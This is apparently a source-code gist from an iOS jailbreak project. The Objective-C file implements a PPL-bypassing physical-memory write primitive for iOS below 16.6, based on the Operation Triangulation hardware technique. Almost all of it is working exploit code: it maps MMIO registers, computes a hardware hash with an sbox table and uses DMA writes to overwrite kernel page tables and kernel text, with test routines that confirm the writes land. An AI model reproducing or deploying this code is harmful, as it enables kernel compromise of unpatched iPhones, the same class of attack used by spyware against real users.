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Last active June 14, 2024 08:29
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PPLRW on iOS < 16.6 (Needs mapping primitive) (Credits: Operation Triangulation by @oct0xor, @bzvr_, @kucher1n)
// pplrw.m
// kfd
// Created by Lars Fröder on 29.12.23.
#import <Foundation/Foundation.h>
#import <dlfcn.h>
#import <mach-o/dyld.h>
#import <sys/sysctl.h>
#import "IOSurface_primitives.h"
#import "intermediate.h"
struct shit_map {
uint64_t pa;
uint8_t *map;
#define CACHED_MAP_LEN 20
struct shit_map gCachedMap[CACHED_MAP_LEN];
void addMapping(uint64_t addr)
for (int i = 0; i < CACHED_MAP_LEN; i++) {
uint64_t page = addr & ~PAGE_MASK;
if (gCachedMap[i].pa == page) {
else if (gCachedMap[i].pa == 0) {
gCachedMap[i].pa = page;
gCachedMap[i].map = IOSurface_map(gCachedMap[i].pa, 0x4000);
void physwrite64_mapped(uint64_t addr, uint64_t val)
for (int i = 0; i < CACHED_MAP_LEN; i++) {
uint64_t page = addr & ~PAGE_MASK;
uint64_t off = addr & PAGE_MASK;
if (gCachedMap[i].pa == page) {
*(uint64_t *)(gCachedMap[i].map + off) = val;
uint64_t physread64_mapped(uint64_t addr)
for (int i = 0; i < CACHED_MAP_LEN; i++) {
uint64_t page = addr & ~PAGE_MASK;
uint64_t off = addr & PAGE_MASK;
if (gCachedMap[i].pa == page) {
return *(uint64_t *)(gCachedMap[i].map + off);
return 0;
void physwrite32_mapped(uint64_t addr, uint32_t val)
for (int i = 0; i < CACHED_MAP_LEN; i++) {
uint64_t page = addr & ~PAGE_MASK;
uint64_t off = addr & PAGE_MASK;
if (gCachedMap[i].pa == page) {
*(uint32_t *)(gCachedMap[i].map + off) = val;
uint32_t physread32_mapped(uint64_t addr)
for (int i = 0; i < CACHED_MAP_LEN; i++) {
uint64_t page = addr & ~PAGE_MASK;
uint64_t off = addr & PAGE_MASK;
if (gCachedMap[i].pa == page) {
return *(uint32_t *)(gCachedMap[i].map + off);
return 0;
void ml_dbgwrap_halt_cpu(void)
if ((physread64_mapped(0x206040000) & 0x90000000) != 0) {
physwrite64_mapped(0x206040000, physread64_mapped(0x206040000) | (1 << 31));
while ((physread64_mapped(0x206040000) & 0x10000000) == 0) { }
void ml_dbgwrap_unhalt_cpu(void)
physwrite64_mapped(0x206040000, ((physread64_mapped(0x206040000) & 0xFFFFFFFF2FFFFFFF) | 0x40000000));
if ((physread64_mapped(0x206040000) & 0x90000000) != 0) {
while ((physread64_mapped(0x206040000) & 0x10000000) != 0) { }
void gfx_power_init(void)
cpu_subtype_t cpuFamily = 0;
size_t cpuFamilySize = sizeof(cpuFamily);
sysctlbyname("hw.cpufamily", &cpuFamily, &cpuFamilySize, NULL, 0);
uint64_t base = 0;
uint32_t command = 0;
switch (cpuFamily) {
case 0x8765EDEA: // A16
base = 0x23B700408;
command = 0x1F0023FF;
case 0xDA33D83D: // A15
base = 0x23B7003C8;
command = 0x1F0023FF;
case 0x1B588BB3: // A14
base = 0x23B7003D0;
command = 0x1F0023FF;
case 0x462504D2: // A13
base = 0x23B080390;
command = 0x1F0003FF;
case 0x07D34B9F: // A12
base = 0x23B080388;
command = 0x1F0003FF;
if ((~physread32_mapped(base) & 0xF) != 0) {
physwrite32_mapped(base, command);
while(true) {
if ((~physread32_mapped(base) & 0xF) == 0) {
void dma_ctrl_1(void)
uint64_t ctrl = 0x206140108;
uint64_t value = physread64_mapped(ctrl);
physwrite64_mapped(ctrl, value | 0x8000000000000001);
while ((~physread64_mapped(ctrl) & 0x8000000000000001) != 0) { /*sleep(1);*/ }
void dma_ctrl_2(bool flag)
uint64_t ctrl = 0x206140008;
uint64_t value = physread64_mapped(ctrl);
if (flag) {
if ((value & 0x1000000000000000) == 0) {
value |= 0x1000000000000000;
physwrite64_mapped(ctrl, value);
else {
if ((value & 0x1000000000000000) == 0) {
value &= ~0x1000000000000000;
physwrite64_mapped(ctrl, value);
void dma_ctrl_3(uint64_t value)
uint64_t ctrl = 0x206140108;
value |= 0x8000000000000000;
physwrite64_mapped(ctrl, physread64_mapped(ctrl) & value);
while ((physread64_mapped(ctrl) & 0x8000000000000001) != 0) { /*sleep(1);*/ }
void dma_init(uint64_t orig)
void dma_done(uint64_t orig)
uint64_t sbox[] = {
0x007, 0x00B, 0x00D, 0x013, 0x00E, 0x015, 0x01F, 0x016,
0x019, 0x023, 0x02F, 0x037, 0x04F, 0x01A, 0x025, 0x043,
0x03B, 0x057, 0x08F, 0x01C, 0x026, 0x029, 0x03D, 0x045,
0x05B, 0x083, 0x097, 0x03E, 0x05D, 0x09B, 0x067, 0x117,
0x02A, 0x031, 0x046, 0x049, 0x085, 0x103, 0x05E, 0x09D,
0x06B, 0x0A7, 0x11B, 0x217, 0x09E, 0x06D, 0x0AB, 0x0C7,
0x127, 0x02C, 0x032, 0x04A, 0x051, 0x086, 0x089, 0x105,
0x203, 0x06E, 0x0AD, 0x12B, 0x147, 0x227, 0x034, 0x04C,
0x052, 0x076, 0x08A, 0x091, 0x0AE, 0x106, 0x109, 0x0D3,
0x12D, 0x205, 0x22B, 0x247, 0x07A, 0x0D5, 0x153, 0x22D,
0x038, 0x054, 0x08C, 0x092, 0x061, 0x10A, 0x111, 0x206,
0x209, 0x07C, 0x0BA, 0x0D6, 0x155, 0x193, 0x253, 0x28B,
0x307, 0x0BC, 0x0DA, 0x156, 0x255, 0x293, 0x30B, 0x058,
0x094, 0x062, 0x10C, 0x112, 0x0A1, 0x20A, 0x211, 0x0DC,
0x196, 0x199, 0x256, 0x165, 0x259, 0x263, 0x30D, 0x313,
0x098, 0x064, 0x114, 0x0A2, 0x15C, 0x0EA, 0x20C, 0x0C1,
0x121, 0x212, 0x166, 0x19A, 0x299, 0x265, 0x2A3, 0x315,
0x0EC, 0x1A6, 0x29A, 0x266, 0x1A9, 0x269, 0x319, 0x2C3,
0x323, 0x068, 0x0A4, 0x118, 0x0C2, 0x122, 0x214, 0x141,
0x221, 0x0F4, 0x16C, 0x1AA, 0x2A9, 0x325, 0x343, 0x0F8,
0x174, 0x1AC, 0x2AA, 0x326, 0x329, 0x345, 0x383, 0x070,
0x0A8, 0x0C4, 0x124, 0x218, 0x142, 0x222, 0x181, 0x241,
0x178, 0x2AC, 0x32A, 0x2D1, 0x0B0, 0x0C8, 0x128, 0x144,
0x1B8, 0x224, 0x1D4, 0x182, 0x242, 0x2D2, 0x32C, 0x281,
0x351, 0x389, 0x1D8, 0x2D4, 0x352, 0x38A, 0x391, 0x0D0,
0x130, 0x148, 0x228, 0x184, 0x244, 0x282, 0x301, 0x1E4,
0x2D8, 0x354, 0x38C, 0x392, 0x1E8, 0x2E4, 0x358, 0x394,
0x362, 0x3A1, 0x150, 0x230, 0x188, 0x248, 0x284, 0x302,
0x1F0, 0x2E8, 0x364, 0x398, 0x3A2, 0x0E0, 0x190, 0x250,
0x2F0, 0x288, 0x368, 0x304, 0x3A4, 0x370, 0x3A8, 0x3C4,
0x160, 0x290, 0x308, 0x3B0, 0x3C8, 0x3D0, 0x1A0, 0x260,
0x310, 0x1C0, 0x2A0, 0x3E0, 0x2C0, 0x320, 0x340, 0x380
uint64_t calculate_hash(uint64_t buffer)
uint64_t acc = 0;
for (uint32_t i = 0; i < 8; i++) {
uint32_t pos = i * 4;
uint32_t value = physread32_mapped(buffer + pos);
for (int j = 0; j < 32; j++) {
if (((value >> j) & 1) != 0) {
acc ^= sbox[32 * i + j];
return acc;
void dma_writephys512(uint64_t targetPA, uint64_t *value)
uint64_t valuePA = __vtophys((uint64_t)value);
assert(valuePA != 0);
cpu_subtype_t cpuFamily = 0;
size_t cpuFamilySize = sizeof(cpuFamily);
sysctlbyname("hw.cpufamily", &cpuFamily, &cpuFamilySize, NULL, 0);
uint32_t i = 0;
uint64_t mask = 0;
switch (cpuFamily) {
case 0x8765EDEA: // A16
i = 8;
mask = 0x7FFFFFF;
case 0xDA33D83D: // A15
i = 8;
mask = 0x3FFFFF;
case 0x1B588BB3: // A14
i = 0x28;
mask = 0x3FFFFF;
case 0x462504D2: // A13
i = 0x28;
mask = 0x3FFFFF;
case 0x07D34B9F: // A12
i = 0x28;
mask = 0x3FFFFF;
uint64_t orig = physread64_mapped(0x206140108);
uint64_t hash1 = calculate_hash(valuePA);
uint64_t hash2 = calculate_hash(valuePA + 0x20);
physwrite64_mapped(0x206150040, 0x2000000 | (targetPA & 0x3FC0));
uint32_t pos = 0;
while (pos < 0x40) {
physwrite64_mapped(0x206150048, physread64_mapped(valuePA + pos));
pos += 8;
uint64_t targetPAUpper = ((((targetPA >> 14) & mask) << 18) & 0x3FFFFFFFFFFFF);
physwrite64_mapped(0x206150048, targetPAUpper | (hash1 << i) | (hash2 << 50) | 0x1f);
#define min(a,b) (((a)<(b))?(a):(b))
void dma_writephysbuf(uint64_t pa, const void *input, size_t size)
size_t sizeLeft = size;
uint8_t *inputData = (uint8_t *)input;
while (sizeLeft > 0) {
uint64_t curCacheLinePA = pa & ~0x3f;
uint64_t curCacheLineOff = pa & 0x3f;
uint64_t writeSize = min(sizeLeft, 0x40 - curCacheLineOff);
uint8_t curCacheLine[0x40];
uint64_t curCacheLineVirt = __phystokv(curCacheLinePA);
kreadbuf(curCacheLineVirt, curCacheLine, sizeof(curCacheLine));
memcpy(&curCacheLine[curCacheLineOff], &inputData[size-sizeLeft], writeSize);
dma_writephys512(curCacheLinePA, (uint64_t *)curCacheLine);
pa += writeSize;
sizeLeft -= writeSize;
void dma_writevirtbuf(uint64_t kaddr, const void* input, size_t size)
uint64_t va = kaddr;
const uint8_t *data = input;
size_t sizeLeft = size;
while (sizeLeft > 0) {
uint64_t virtPage = va & ~PAGE_MASK;
uint64_t pageOffset = va & PAGE_MASK;
uint64_t writeSize = min(sizeLeft, PAGE_SIZE - pageOffset);
uint64_t physPage = __vtophys(virtPage);
if (physPage == 0 && errno != 0) {
dma_writephysbuf(physPage + pageOffset, &data[size - sizeLeft], writeSize);
va += writeSize;
sizeLeft -= writeSize;
void dma_writephys64(uint64_t pa, uint64_t val)
dma_writephysbuf(pa, &val, sizeof(val));
void dma_writephys32(uint64_t pa, uint32_t val)
dma_writephysbuf(pa, &val, sizeof(val));
void dma_writephys16(uint64_t pa, uint16_t val)
dma_writephysbuf(pa, &val, sizeof(val));
void dma_writephys8(uint64_t pa, uint8_t val)
dma_writephysbuf(pa, &val, sizeof(val));
void dma_writevirt64(uint64_t pa, uint64_t val)
dma_writevirtbuf(pa, &val, sizeof(val));
void dma_writevirt32(uint64_t pa, uint32_t val)
dma_writevirtbuf(pa, &val, sizeof(val));
void dma_writevirt16(uint64_t pa, uint16_t val)
dma_writevirtbuf(pa, &val, sizeof(val));
void dma_writevirt8(uint64_t pa, uint8_t val)
dma_writevirtbuf(pa, &val, sizeof(val));
void dma_perform(void (^block)(void))
bool test_pplrw_phys(void)
uint64_t tte = kread64(get_current_pmap());
uint64_t tte1 = kread64(tte);
uint64_t table = tte1 & ~0xfff;
uint64_t table_v = __phystokv(table);
uint64_t og1 = kread64(table_v + 8);
uint64_t og2 = kread64(table_v + 16);
__block bool work1 = false, work2 = false;
dma_writephys64(table + 8, 0x4141414141414141);
dma_writephys64(table + 16, 0x4242424242424242);
if (kread64(table_v + 8) == 0x4141414141414141) {
dma_writephys64(table + 8, og1);
work1 = true;
if (kread64(table_v + 16) == 0x4242424242424242) {
dma_writephys64(table + 16, og2);
work2 = true;
return (work1 && work2);
bool test_pplrw_virt(void)
uint64_t tte = kread64(get_current_pmap());
uint64_t tte1 = kread64(tte);
uint64_t table = tte1 & ~0xfff;
uint64_t table_v = __phystokv(table);
uint64_t og1 = kread64(table_v + 8);
uint64_t og2 = kread64(table_v + 16);
__block bool work1 = false, work2 = false;
dma_writevirt64(table_v + 8, 0x4141414141414141);
dma_writevirt64(table_v + 16, 0x4242424242424242);
if (kread64(table_v + 8) == 0x4141414141414141) {
dma_writevirt64(table_v + 8, og1);
work1 = true;
if (kread64(table_v + 16) == 0x4242424242424242) {
dma_writevirt64(table_v + 16, og2);
work2 = true;
return (work1 && work2);
int test_pplrw(void)
if (test_pplrw_phys()) {
printf("test_pplrw_phys: success!\n");
else {
printf("test_pplrw_phys: fail!\n");
return -1;
if (test_pplrw_virt()) {
printf("test_pplrw_virt: success!\n");
else {
printf("test_pplrw_virt: fail!\n");
return -1;
return 0;
int test_kttr(void)
dma_writevirt32(get_kslide() + 0xfffffff007d6b998, 0x37c3);
return 0;
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